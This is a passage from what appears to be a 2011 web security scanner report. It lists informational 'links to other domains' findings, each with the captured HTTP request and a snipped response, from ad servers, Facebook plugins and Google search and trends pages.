Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4E62BFAA6E651A4418BD90FFF0005EB9; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 941

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

20.16. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115078&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&dt=1315097078745&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097078791&frm=7&adk=1459060001&ga_vid=1850965108.1315097079&ga_sid=1315097079&ga_hid=81835406&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=4291066834&fu=4&ifi=1&dtd=50 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:44:01 GMT
Server: cafe
Cache-Control: private
Content-Length: 4506
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&amp;usg=AFQjCNE5R0GVl60AbarOa8Q4B606oaUEAA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

20.17. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959; uid=1_1315097051_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5489

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...
<td align="center"><a href="http://get.adobe.com/flashplayer/" target="_blank">Can not display content.<br>
...[SNIP]...

20.18. http://pixel.invitemedia.com/admeld_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 04-Sep-2011 01:04:45 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 219

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530305&custom_user_segments=%2C17329%2C27165"/>');

20.19. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 04 Sep 2011 00:44:05 GMT
Connection: close
Content-Length: 6162

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<div id="jobstream" style="'+cb__wth+'">');
document.write('<img src="http://img.icbdr.com/images/plink/logos/CB.com_websafe_2-color_thumb.gif" /><br />
...[SNIP]...

20.20. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap2-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; rdk2=0; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Sat, 03 Sep 2011 05:07:44 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 01:11:34 GMT
Date: Sun, 04 Sep 2011 01:01:34 GMT
Content-Length: 9192
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!-- Copyright the Rubicon Project 2010 -->


<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>


</body>
...[SNIP]...

20.21. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.54
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:33 GMT
Content-Length: 8517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/thecharlotteobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203512_42580340317_3245881_q.jpg" alt="The Charlotte Observer" /></a>
...[SNIP]...

20.22. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.49
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 21035

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man&#039;s penis cut off, put through garbage disposal | CharlotteObserver.com &amp; The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&amp;url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank">Man&#039;s penis cut off, put through garbage disposal | CharlotteObserver.com &amp; The Charlotte Observer N</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1c19143ccfb743a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WBT terminates Tara Servatius | CharlotteObserver.com &amp; The Charlotte Observer Newspaper" href="http://www.charlotteobserver.com/2011/05/27/2330268/wbt-terminates-tara-servatius.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQApA4nIHITlt2Qx&amp;url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F05%2F26%2F20%2F9H7A7DJ_Tara_Servatiu_BZ_12.embedded.prod_affiliate.138.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/05/27/2330268/wbt-terminates-tara-servatius.html" target="_blank">WBT terminates Tara Servatius | CharlotteObserver.com &amp; The Charlotte Observer Newspaper</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6ec34df0e64057e4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WBT-AM fires Tara Servatius | CharlotteObserver.com &amp; The Charlotte Observer Newspaper" href="http://www.charlotteobserver.com/2011/05/27/2329617/servatius-wbt-am-part-ways.html#storylink=omni_popular" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQApA4nIHITlt2Qx&amp;url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F05%2F26%2F20%2F9H7A7DJ_Tara_Servatiu_BZ_12.embedded.prod_affiliate.138.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/05/27/2329617/servatius-wbt-am-part-ways.html#storylink=omni_popular" target="_blank">WBT-AM fires Tara Servatius | CharlotteObserver.com &amp; The Charlotte Observer Newspaper</a>
...[SNIP]...

20.23. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=google+trend+top+search HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:40:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 97988

<!doctype html> <head> <title>google trend top search - Google Search</title> <script>window.google={kEI:"F8liTrXhN8vUiAKRuNDFCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttr
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=google+trend+top+search&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:MC-aI-QqmRAJ:www.google.com/trends+google+trend+top+search&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:uvKavSff1xUJ:www.google.com/trends/hottrends+google+trend+top+search&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:omyin9RPpAoJ:www.google.com/insights/search/+google+trend+top+search&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:aNjnosO20ssJ:www.google.com/intl/en/press/zeitgeist/index.html+google+trend+top+search&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CDYQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Google_Trends" class=l onmousedown="return clk(this,this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ilC_ouuUnAgJ:en.wikipedia.org/wiki/Google_Trends+google+trend+top+search&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CD8QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://antezeta.com/news/top-keyword-search-trends" class=l onmousedown="return clk(this,this.href,'','','','6','','0CEQQFjAF')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:VGZMnyjc6JwJ:antezeta.com/news/top-keyword-search-trends+google+trend+top+search&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CEYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mibazaar.com/googletrends.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEoQFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:v2G51Y-L1jwJ:www.mibazaar.com/googletrends.html+google+trend+top+search&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bayareasearchengineacademy.org/blog/?p=9" class=l onmousedown="return clk(this,this.href,'','','','8','','0CFEQFjAH')">100 <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1kIIJuYu8_oJ:www.bayareasearchengineacademy.org/blog/%3Fp%3D9+google+trend+top+search&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:1kIIJuYu8_oJ:www.bayareasearchengineacademy.org/blog/%3Fp%3D9+google+trend+top+search&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CFMQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pandia.com/sew/246-google-trends.html" class=l onmousedown="return clk(this,this.href,'','','','9','','0CFgQFjAI')">Using <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:6AfPomsYIwQJ:www.pandia.com/sew/246-google-trends.html+google+trend+top+search&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CFoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://top10googletrends.com/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:GEiTu6XRlFkJ:top10googletrends.com/+google+trend+top+search&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CGEQIDAJ')">Cached</a>
...[SNIP]...

20.24. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=longhorn+network&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:34 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11541
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: longhorn network, Sep 3,
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.businessinsider.com/espns-new-longhorn-network-not-available-to-most-at-university-of-texas-2011-9" target="_blank">
ESPN: <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.businessinsider.com/" target="_blank"> http://www.businessinsider.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.burntorangenation.com/2011/9/2/2401449/kansas-texas-to-air-on-longhorn-network" target="_blank">
Kansas-Texas to air on <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.burntorangenation.com/" target="_blank"> http://www.burntorangenation.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://suddenlinkfyi.com/2011/09/02/longhorn-network/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://suddenlinkfyi.com/" target="_blank"> http://suddenlinkfyi.com/</a>
...[SNIP]...

20.25. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

